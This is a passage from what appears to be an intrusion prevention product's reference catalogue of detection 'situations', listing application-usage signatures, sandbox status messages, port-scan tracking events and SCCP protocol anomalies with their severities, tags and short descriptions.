Description: Salesnet - online CRM provider of software, specializing in managing and reinforcing successful sales performance, focused on delivering solutions that empower companies to sell more effectively.
Back to top

SalesNexus

About this situation: Application SalesNexus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SalesNexus is a CRM tool for small businesses that helps your sales and marketing teams know which customers and leads to target and helps you effectively close on them. By using an online CRM solution you can stay up to date from anywhere without IT challenges to distract you with other online contact managers. SalesNexus is a fully featured online CRM with sales automation, email marketing, team collaboration and database customization.
Back to top

Salespoint-Mobile-CRM

About this situation: Application Salespoint-Mobile-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Salespoint CRM solution designed for mobile and aimed at maximum user adoption.
Back to top

SalesSystemCRM

About this situation: Application SalesSystemCRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Online CRM Sales Software for invoicing and multi-location inventory control. SalesSystemCRM offers features to handle sales, purchasing and inventory management.
Back to top

Salestrakr

About this situation: Application Salestrakr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Salestrakr is a CRM application for businesses. Perfect for sales teams, business owners and networks of independent agents, allows quickly and cost effectively manage their prospects, customers and opportunities.
Back to top

Saleswah

About this situation: Application Saleswah detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Saleswah CRM - Small business CRM: Connecting activities to business results. Saleswah lines up your most promising opportunities
Back to top

Salsa-Labs

About this situation: Application Salsa-Labs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Explore Salsa's Supporter Engagement Platform for Donor Management, Online Fundraising, Online Advocacy, Digital Marketing, Events, Peer to Peer Fundraising.
Back to top

SAManage

About this situation: Application SAManage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Samanage is a leading provider of real cloud-based IT service desk and asset management software that helps companies govern their IT environment.
Back to top

Samepage

About this situation: Application Samepage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Samepage is award-winning online collaboration software designed to keep your team, consultants, customers, partners, and vendors working together smoothly and efficiently. Combine files, photos, cloud content, maps, videos and team conversation together.
Back to top

Samsung

About this situation: Samsung usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1145-5242
Last changed: sgpkg-ips-1677-5242
Description: Samsung is a multinational conglomerate whose flagship is Samsung Electronics, the worlds largest manufacturer of consumer electronics.
Back to top

Samsung Easy Printer

About this situation: Endpoint Context Agent based Samsung Easy Printer detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-1097-5242
Last changed: sgpkg-ips-1097-5242
Description: A network connection launched by Samsung Easy Printer was detected. Samsung Easy Printer is a software for managing Samsung Printers.
Back to top

Samsung Magician

About this situation: Endpoint Context Agent based Samsung Magician detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1093-5242
Description: Samsung Magician endpoint application has been detected. Samsung Magician is a software used for managing Samsung SSD's.
Back to top

Samsung MIFAgent

About this situation: Endpoint Context Agent based Samsung MIFAgent detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-1183-5242
Last changed: sgpkg-ips-1183-5242
Description: Samsung MIFAgent endpoint application has been detected.
Back to top

Samsung-Apps

About this situation: Samsung Apps usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1144-5242
Description: Samsung Apps is a marketplace that offers easy access to a variety of applications which are specially designed and carefully selected for Samsung smart device.
Back to top

Samsung-Knox

About this situation: Samsung Knox usage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Description: Samsung Knox is a pre-installed set of security features for Samsung's smartphones, tablets, and wearables. Samsung also offers Knox Suite for enterprises. Knox Suite provides various additional security solutions, like the cloud-based EMM/MDM Knox Manage.
Back to top

San-Diego-County-Credit-Union

About this situation: Application San-Diego-County-Credit-Union detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: San Diego County Credit Union is a financial institution. It is a not for profit credit union owned and operated by its members.
Back to top

Sana-Commerce

About this situation: Application Sana-Commerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sana Commerce delivers B2B e-commerce solutions for Microsoft Dynamics and SAP that helps wholesalers, distributors and manufacturers.
Back to top

Sandbox_Cannot-Connect

About this situation: Could not connect to the sandbox
Context: Sandbox
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: Could not connect to the sandbox. Unable to perform queries.
Back to top

Sandbox_Connection-Acquired

About this situation: Connection to the sandbox was acquired
Context: Sandbox
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: Connection to the sandbox was acquired. Ready to perform queries.
Back to top

Sandbox_Connection-Lost

About this situation: Connection to the sandbox was lost
Context: Sandbox
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: The connection to the sandbox was lost. Unable to perform queries.
Back to top

Sandbox_File-Too-Big

About this situation: This file is too large for sandbox analysis
Context: File Filtering
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-864-5242
Last changed: sgpkg-ips-864-5242
Description: This file could not be submitted to the sandbox for analysis because the file is too large for sandbox analysis.
Back to top

Sandbox_File-upload

About this situation: The file is being uploaded to sandbox for analysis
Context: File Filtering
Severity: 1
Tags: File Filtering
First detected in: sgpkg-ips-865-5242
Last changed: sgpkg-ips-865-5242
Description: The sandbox does not have a previous analysis result for this file. The file is being uploaded to sandbox for analysis.
Back to top

Sandbox_Getting-Completed-Tasks-Failed

About this situation: Getting completed analysis tasks from the sandbox failed
Context: Sandbox
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: Getting the list of completed analysis tasks from the sandbox failed.
Back to top

Sandbox_Getting-Results-Failed

About this situation: Getting analysis results from the sandbox failed
Context: File Filtering
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: Getting analysis results from the sandbox failed.
Back to top

Sandbox_Unsupported-File-type

About this situation: Sandbox analysis does not support this file type
Context: File Filtering
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-864-5242
Last changed: sgpkg-ips-864-5242
Description: This file could not be submitted to the sandbox for analysis because sandbox analysis does not support this file type.
Back to top

Sandbox_Uploading-File-Failed

About this situation: Uploading a file to the sandbox failed
Context: File Filtering
Severity: 8
Tags: File Filtering
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: There was an error when a file was being uploaded to the sandbox for analysis.
Back to top

Sandglaz

About this situation: Application Sandglaz detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sandglaz - online task manager for teams.
Back to top

SanMar

About this situation: Application SanMar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SanMar is the supplier of wholesale imprintable clothing and accessories.
Back to top

Sanoma

About this situation: Sanoma usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1796-5242
Description: Sanoma Oyj is a Finnish media group.
Back to top

Sanoma-Tasku

About this situation: Sanoma Tasku usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-628-5211
Description: Sanoma Tasku is a media content delivery service.
Back to top

Santander

About this situation: Santander usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-641-5211
Last changed: sgpkg-ips-1764-5242
Description: Santander usage detected. Santander is a Spanish banking corporation.
Back to top

Santrax-Electronic-Visit-Verification

About this situation: Application Santrax-Electronic-Visit-Verification detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sandata Technologies is a provider of workforce and operational management solutions and services that enable government agencies, Managed Care Organizations, and home care providers to manage and optimize the delivery of home care services.
Back to top

SAP

About this situation: Application SAP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SAP is a German multinational software corporation that makes enterprise software to manage business operations and customer relations.
Back to top

SAP-BI-OnDemand

About this situation: SAP Business Objects BI OnDemand usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-628-5211
Description: SAP BusinessObjects BI OnDemand is a business intelligence solution that allows users to explore, report and share data.
Back to top

SAP-Hana-Cloud

About this situation: SAP HANA Cloud usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: SAP HANA Cloud Platform is an open, standards-based and modular platform as a service for rapid development of on-demand applications.SAP HANA Cloud Portal formerly known as SAP NetWeaver Cloud Portal.
Back to top

SAP-Hybris-Marketing-Convert

About this situation: Application SAP-Hybris-Marketing-Convert detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Hybris Marketing Convert is an analyzing software of customer events in real-time. It lets follow up with one-to-one email and ad promotions, based on an individuals behavior and interests.
Back to top

SAP-Sales-OnDemand

About this situation: SAP Sales OnDemand usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-628-5211
Description: SAP Sales OnDemand is a cloud sales application.
Back to top

SAP-StreamWork

About this situation: SAP StreamWork usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-628-5211
Description: SAP StreamWork is an enterprise collaboration tool.
Back to top

Sapenta

About this situation: Application Sapenta detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Sapenta is all-in-one enterprise software for connected projects, teams and backoffice management.
Back to top

Saperion

About this situation: Application Saperion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SAPERION is a manufacturer of Enterprise Content Management and Business Process Management software.
Back to top

Saprock

About this situation: Application Saprock detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Saprock is a Web Design, Web Development and Web Hosting and creative Website Designing, Website Development and Web Promotion Services. Being an online web development, web design and search engine marketing outsourcing firm, Saprock has a long and proven record of a number of successful performances for various esteemed customers from the diverse industries, spread across Globe.
Back to top

SAS

About this situation: Application SAS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SAS Business Analytics is a software suite developed by SAS Institute for advanced analytics, business intelligence, data management, and predictive analytics.
Back to top

Satakunnan-Kansa

About this situation: Satakunnan Kansa usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-628-5211
Description: Satakunnan Kansa is a Finnish daily newspaper.
Back to top

Satuit

About this situation: Application Satuit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Satuit Technologies offers cloud based and on premise CRM software for asset management, wealth management, hedge funds, and private equity firms.
Back to top

Sauce-Labs

About this situation: Sauce Labs usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: This platform provides automated and manual code testing with reporting features.
Back to top

Savagebattle-For-Newerth

About this situation: Savage:Battle for Newerth usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: A science fantasy computer game that combines aspects of the Real-time strategy and First-person shooter genres. Source: Wikipedia
Back to top

Save-Local-Now

About this situation: Application Save-Local-Now detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Save Local Now is a platform for businesses and chambers to better their community. It help local businesses grow by placing marketing and self promotion in their hands and delivering it to their customers for them with the help of mobile technology.
Back to top

SAVO

About this situation: Application SAVO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SAVO Sales Enablement software provides solutions that improve sales productivity, sales process, onboarding and ensures consistency in sales messaging.
Back to top

Savvis

About this situation: Application Savvis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Demandforce provides marketing automation and reputation management solutions for dental, medical, spa and salon, automotive, optometry, and veterinary industries.
Back to top

SB-Nation

About this situation: SB-Nation usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-602-5211
Last changed: sgpkg-ips-1764-5242
Description: SB-Nation usage detected. SB-Nation is an american football news website operated by Vox Media.
Back to top

Sbs-Netv

About this situation: SBS NeTV usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-689-5211
Description: SBS NeTV is an online video streaming service of SBS, Seoul Broadcasting System of Korea. The service is largely used in Korea and allows users to watch TV series, movies, entertainments etc. The application can be accessed using a web browser at the site: http://netv.sbs.co.kr.
Back to top

ScaleXtreme

About this situation: Application ScaleXtreme detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ScaleXtreme provides enterprise-class cloud-management solutions for automating the delivery and management of IT services, applications, and server infrastructure across multiple public and private clouds.
Back to top

Scality

About this situation: Application Scality detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Scality produces cloud storage software.
Back to top

Scalr

About this situation: Application Scalr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Scalr is an open source Cloud Management Platform for managing multi-cloud infrastructure.
Back to top

Scan

About this situation: Application Scan detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Scan.me - QR Code Generator and Barcode Scanner.
Back to top

ScanMarket

About this situation: Application ScanMarket detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Scanmarket is the market- global strategic sourcing platform
Back to top

Scan_Completed

About this situation: Host/Port scanning activity from this originator ended
Context: Scan detection without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: Scanning activity has exceeded the defined idle timeout. The scanning activity is assumed to have ended. Host/Port scan tracking is completed for this originating host. Host/Port scan tracking will be started again for this originating host if any of the defined port scanning thresholds is exceeded.
Back to top

Scan_In-Progress

About this situation: Status report on an ongoing host/port scanning activity
Context: Scan detection without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: A previously detected host/port scanning activity is still in progress. The detected addresses that were scanned so far are listed in this log entry. Tracking of this host/port scanning activity is in progress.
Back to top

Scan_Interrupted-Policy-Install

About this situation: Port scan tracking interrupted by policy install
Context: Scan detection without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: Tracking of the scanning activity was interrupted because a new policy was installed on the Sensor. Host/Port scan tracking will be started again for this originating host if any of the defined port scanning thresholds is exceeded.
Back to top

Scan_Untrackable

About this situation: New host/port scan activity detected
Context: Scan detection without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: New scan activity was detected, but the sensor has no resources for tracking. Connection attempts from this originating host have matched the port scanning detection parameters. This host/port scanning cannot be tracked further due to too many simultaneous host/port scans under inspection. Risk analysis: Risk level is medium. Port scanning can be used as part of information gathering process and it often precedes an actual attack.
Back to top

SCCP_invalid_length_in_client_header

About this situation: Length field contains value that does not fit in message.
Context: SCCP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-517-5211
Last changed: sgpkg-ips-1531-5242
Description: Each SCCP message contains a length field in its header that indicates the total length of the message. The situation occurs when the length field contains a value that does not fit in the message ID. This may be an attack attempt, especially when the length is higher than expected for a given message. The attacker may try to inject extra data into the message to exploit a buffer overflow vulnerability. Risk analysis: Risk level is medium.
Back to top

SCCP_invalid_message_direction

About this situation: SCCP message sent in incorrect direction.
Context: SCCP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-517-5211
Last changed: sgpkg-ips-1531-5242
Description: The source of a received SCCP message is different than the expected source for the message ID. The situation occurs when a message with a given ID should be sent by the Call Manager, but the message has been received from a VoIP phone or vice versa. This may indicate an attack attempt, in which the attacker tries to send SCCP messages from various IP addresses. Risk analysis: Risk level is medium.
Back to top

SCEP

About this situation: SCEP traffic detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-573-5211
Last changed: sgpkg-ips-595-5211
Description: Simple Certificate Enrollment Protocol (SCEP) is an internet draft created to simplify digital certificate management in large environments. The protocol relies on PKCS#7 and PKCS#10 over HTTP.
Back to top

Schawk

About this situation: Application Schawk detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Schawk
Back to top

ScheduFlow

About this situation: Application ScheduFlow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ScheduFlow Online is an appointment scheduling software which combines the power of our desktop scheduling software with the accessibility of the Internet.
Back to top

ScheduleAnywhere

About this situation: Application ScheduleAnywhere detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Scheduling software cuts scheduling time, reduces overtime, better utilizes staff. Enterprise-wide visibility.
Back to top

ScheduleBase

About this situation: Application ScheduleBase detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ScheduleBase is easy, flexible and affordable online employee scheduling and communication software.
Back to top

ScheduleBull

About this situation: Application ScheduleBull detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Schedulebull is web-based car rental software, hotel software system and hostel software. It compares client, car, room databases with design, automatic reports, contract generating, web site management, email client in cloud software system
Back to top

ScheduleSmart

About this situation: Application ScheduleSmart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Schedule Smart is a web-based product that connects automotive dealers and expeditors for online scheduling of appointments and updates.
Back to top

Scheduling

About this situation: Application Scheduling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: With Scheduling, you can make the schedule and get back to work. Scheduling remembers what times people can work.
Back to top

SchemeIt

About this situation: Application SchemeIt detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SchemeIt is an online schematic drawing tool that will allow you to produce professional looking schematic diagrams, add corresponding part numbers, and share your schematic with others.
Back to top

Schlumberger

About this situation: Application Schlumberger detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Schlumberger is the provider of technology for reservoir characterization, drilling, production, and processing to the oil and gas industry.
Back to top

Schneider-Electric-DCIM

About this situation: Schneider Electric DCIM usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-687-5211
Description: Schneider Electric data center infrastructure management (DCIM) is an online solution for customers to manage their data center assets.
Back to top

Schneider-Electric-eNet

About this situation: Schneider-Electric-eNet usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-773-5211
Last changed: sgpkg-ips-773-5211
Description: Schneider Electric eNet is a service where building inftrastructure can be monitored and controlled remotely.
Back to top

SchoolDude

About this situation: Application SchoolDude detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SchoolDude deliver cloud-based applications that help both small and large institutions better manage their facilities, IT and business operations, help clients save time and money by managing support services effectively and efficiently, allowing institutions to provide a safe teaching and learning environment.
Back to top

SchoolKeep

About this situation: Application SchoolKeep detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SchoolKeep helps companies train employees, customers and channel partners by combining course creation, learning management, custom branding and reporting tools.
Back to top

Schoology

About this situation: Schoology usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Schoology is a learning management system (LMS) for K-12 schools, higher education institutions, and corporations that allows users to create, manage, and share content and resources. Also known as a course management system (CMS) or Virtual Learning Environment (VLE), the cloud-based platform provides tools needed to manage any classroom or blended learning environment.
Back to top

SchoolsFirst-FCU

About this situation: Application SchoolsFirst-FCU detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SchoolsFirst FCU is a not-for-profit organization rooted in the credit union and built on traditional values of commitment to service, respect for the individual, and fiscal responsibility.
Back to top

Schwab

About this situation: Schwab usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-839-5242
Description: Charles Schwab Corporation is an American investment, banking and trading company.
Back to top

Sciencelogic

About this situation: Application Sciencelogic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ScienceLogic delivers the next generation IT monitoring platform for the Internet of everything. ScienceLogic helps customers take the guesswork out of public cloud migration. With extensive visibility into AWS and other cloud platforms, customers can view their cloud-based assets and the dependencies between them, ensuring complete visibility of Hybrid IT infrastructure - whether physical, virtual, on-premise or in the cloud.
Back to top

sciquest

About this situation: Application sciquest detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SciQuest offers cloud-based Procurement, Spend Analysis, Supplier, Sourcing, Contract and Inventory Management, and Accounts Payable Software
Back to top

Scispace

About this situation: SciSpace usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: The Student Resource Centre distributes and sells course books and has 40 laptops available for use by Faculty of Science students. Laptops are loaned out between 9am and 4pm for up to two hours. One renewal is possible for an additional two hours.
Back to top

Scoop.it

About this situation: Application Scoop.it detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Scoop.it helps professionals as well as businesses and enterprise clients discover, curate and publish content to increase their visibility online.
Back to top

Scootle

About this situation: Application Scootle detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Scootle provides Australian teachers with access to more than 20,000 quality-assured digital learning resources aligned to the Australian Curriculum.
Back to top

Scorebuddy

About this situation: Application Scorebuddy detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Scorebuddy is used to score customer service interactions in a contact centre. This quality monitoring application allows managers to score employee performance across teams, channels, supervisors and interactions. All scores are in one place and there is a wide variety or reporting and analytics available.
Back to top

ScorecardResearch

About this situation: ScorecardResearch usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-705-5211
Description: Scorecard-Research usage has been detected.
Back to top

SCORM-Cloud

About this situation: Application SCORM-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SCORM Cloud hosts, delivers and tracks e-learning content. Deployment options include a simple interface, pre-built integrations with popular platforms, and an API to develop a custom integration.
Back to top

Scorpion-Software

About this situation: Application Scorpion-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Scorpion Software solves the obvious problems with passwords that others ignore. Deliver solutions to offer password management, two-factor authentication and single sign on capabilities for IT Service Providers and IT departments of small and midsized businesses.
Back to top

Scottrade

About this situation: ScotTrade usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Scottrade provides online trading and online investing to its customers in the United States, and also offers special services to its Asian-Pacific customers with a Chinese service center. Source: Wikipedia
Back to top

Scout-Labs

About this situation: Application Scout-Labs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Scout Labs is a powerful, web-based application that finds signals in the noise of social media to help teams build better products and stronger customer relationships.
Back to top

Scrapetorrent

About this situation: scrapetorrent usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, P2P, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A p2p download service that allows users to search for torrent files for various types of content such as pirated software, movies, and music.
Back to top

Screen9

About this situation: Screen9 usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-664-5211
Last changed: sgpkg-ips-754-5211
Description: Screen9 is an online video distiribution and publishing plaform.
Back to top

Screencast

About this situation: Screencast usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-636-5211
Description: A screencast (a video screen capture) is a digital recording of computer screen output, often containing audio narration. Screencasts are widely used in software or product demonstrations, education, and organization seminars etc. By using TechSmith's screencast products such as Camtasia Studio, Jing and Snagit etc, users can create screencasts and seamlessly upload them to its cloud storage website http://www.screencast.com for sharing.
Back to top

Screencast-O-Matic

